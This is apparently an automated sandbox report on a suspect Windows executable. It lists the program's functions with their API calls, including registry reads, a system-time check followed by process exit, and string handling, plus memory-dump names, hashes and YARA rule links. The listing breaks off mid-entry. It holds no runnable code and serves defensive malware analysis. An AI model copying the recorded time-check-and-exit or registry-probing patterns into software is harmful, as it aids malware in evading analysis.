                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00E580BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E580EA
                                • StrCmpCA.SHLWAPI(00000000,00E74C3C), ref: 00E58102
                                • lstrlen.KERNEL32(00000000), ref: 00E58140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5816F
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: d6e0dc11f64dff47196e4a5b43f75aceeef7cea5d5100992a79ec4dfc218b1fa
                                • Instruction ID: 5e52ba62b85aef0a7dbeeb92379b04d45383c95f6b6d17f3955ca4504dcb0805
                                • Opcode Fuzzy Hash: d6e0dc11f64dff47196e4a5b43f75aceeef7cea5d5100992a79ec4dfc218b1fa
                                • Instruction Fuzzy Hash: 3E418D71600106ABDB21DF68DA48BAABBF4EF44315F10981DAD8AF7244EB34DD49CB90
                                Function 00E61B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00E61B72
                                  • Part of subcall function 00E61820: lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E6184F
                                  • Part of subcall function 00E61820: lstrlen.KERNEL32(016B6EF0), ref: 00E61860
                                  • Part of subcall function 00E61820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E61887
                                  • Part of subcall function 00E61820: lstrcat.KERNEL32(00000000,00000000), ref: 00E61892
                                  • Part of subcall function 00E61820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E618C1
                                  • Part of subcall function 00E61820: lstrlen.KERNEL32(00E74FA0), ref: 00E618D3
                                  • Part of subcall function 00E61820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E618F4
                                  • Part of subcall function 00E61820: lstrcat.KERNEL32(00000000,00E74FA0), ref: 00E61900
                                  • Part of subcall function 00E61820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E6192F
                                • sscanf.NTDLL ref: 00E61B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E61BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E61BC6
                                • ExitProcess.KERNEL32 ref: 00E61BE3
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: 51f870bd70efaaa95c6158eaf2753df579ad995f319b5a111e54485eaf4f9502
                                • Instruction ID: af8ec26382063b8af2d030520dbd5ee6541ca9a4fe96395443403d06a00ddca8
                                • Opcode Fuzzy Hash: 51f870bd70efaaa95c6158eaf2753df579ad995f319b5a111e54485eaf4f9502
                                • Instruction Fuzzy Hash: CB21E2B1918301AF8351DF69D88485FBBF8EEC8354F409A1EF5A9D3214E734D5088BA2
                                Function 00E63130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E63166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E6316D
                                • RegOpenKeyExA.ADVAPI32(80000002,016BB9B8,00000000,00020119,?), ref: 00E6318C
                                • RegQueryValueExA.ADVAPI32(?,016CDDD0,00000000,00000000,00000000,000000FF), ref: 00E631A7
                                • RegCloseKey.ADVAPI32(?), ref: 00E631B1
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: be5a3f2848b8473f492e9b9836f3a52e5b08b24240b02b18eedffd33aa3fb5e7
                                • Instruction ID: a56d412f32f229a2ff011fb79ee4025f101a7037d4e10f85d4910dae780a88f2
                                • Opcode Fuzzy Hash: be5a3f2848b8473f492e9b9836f3a52e5b08b24240b02b18eedffd33aa3fb5e7
                                • Instruction Fuzzy Hash: 3A114276A40209AFD720CF94E949FABB7BCE744725F00412AFA05F3684D77559008BA1
                                Function 00E690DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 6942eb7f1c6667d975e55ba28e05be37776c58ee6508ad18087b7ae1d0819b67
                                • Instruction ID: 30c8a12fc4987570eea80c34f284605fc98b04e16fc578493ddf2abeb9f9f942
                                • Opcode Fuzzy Hash: 6942eb7f1c6667d975e55ba28e05be37776c58ee6508ad18087b7ae1d0819b67
                                • Instruction Fuzzy Hash: 2141397054075CAEDB318B24EC98FFB7BFC9B45388F1454E8E996A6183E2719A45CF20
                                Function 00E48980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E48996
                                  • Part of subcall function 00E6A1C0: std::exception::exception.LIBCMT ref: 00E6A1D5
                                  • Part of subcall function 00E6A1C0: std::exception::exception.LIBCMT ref: 00E6A1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E489CD
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A188
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: d8eaa3cdd79348623bd05ad0592344911777de56b402cc50fb7d61273b155c9c
                                • Instruction ID: a65515ecff7970d61c1bc7e1d037390561d7512a5f688a4c7c960695889e4acc
                                • Opcode Fuzzy Hash: d8eaa3cdd79348623bd05ad0592344911777de56b402cc50fb7d61273b155c9c
                                • Instruction Fuzzy Hash: D421F6723006504BC7219A6CF940A6EF7D9DBA17A4F15293FF245EB281CBB1DC41C3A5
                                Function 00E48850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E48883
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A188
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 4408b2c37d2463a67f933b9a4a2a0db40572ec1286a1767eb3ff5e6c1bdc1f53
                                • Instruction ID: ef094a7c103519d863bf3d933e49cbb81284c1e54d02fc842a828ba6d9013985
                                • Opcode Fuzzy Hash: 4408b2c37d2463a67f933b9a4a2a0db40572ec1286a1767eb3ff5e6c1bdc1f53
                                • Instruction Fuzzy Hash: 1B31B7B5E005159FCB08DF58D9906ADBBB6EB88350F188269E915AB384DB30AD01CB91
                                Function 00E65910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E65922
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A188
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E65935
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: 4be051bdee8dfb29400cbabef4b7a0aa4bf6d28cd9141f1d5ec627d52682cca9
                                • Instruction ID: df60e8a95cf5176c7dc1c9069d2f2e5a838945cb25ecfec002df9d2f8f01142e
                                • Opcode Fuzzy Hash: 4be051bdee8dfb29400cbabef4b7a0aa4bf6d28cd9141f1d5ec627d52682cca9
                                • Instruction Fuzzy Hash: 16118232344B40CBC7328B2CF800719BBE1EBD67A0F251A6DE0E1A7695C761D841C7A1
                                Function 00E63CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00E6A430,000000FF), ref: 00E63D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E63D27
                                • wsprintfA.USER32 ref: 00E63D37
                                  • Part of subcall function 00E671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E671FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 6308470fc62b907472cb191b7c075aaf41c6a307ed3052bca793b998d0f77260
                                • Instruction ID: a849c37a7e9b66829bb988a6c28edbfcd2e312fa9c0423610918c8eff581667e
                                • Opcode Fuzzy Hash: 6308470fc62b907472cb191b7c075aaf41c6a307ed3052bca793b998d0f77260
                                • Instruction Fuzzy Hash: 0201AD71A80304BFE7215B54AC0AF6ABB78FB45B65F004115FA15B72C0D6BA1900CBE1
                                Function 00E48710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E48737
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A188
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 461a9f785ffc771bcf1f54f4ad0b62532b3150815162f07e5c4d38e676f39eab
                                • Instruction ID: d506518710771c61d677d0be7099223bc62ca7fe9c7a38434cac95262c3279f3
                                • Opcode Fuzzy Hash: 461a9f785ffc771bcf1f54f4ad0b62532b3150815162f07e5c4d38e676f39eab
                                • Instruction Fuzzy Hash: BFF0B437F400210F8314643DAE8849EAD4796E53E077AE726E95AFF399EC70EC8295D4
                                Function 00E686D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E6781C: __mtinitlocknum.LIBCMT ref: 00E67832
                                  • Part of subcall function 00E6781C: __amsg_exit.LIBCMT ref: 00E6783E
                                • ___addlocaleref.LIBCMT ref: 00E68756
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
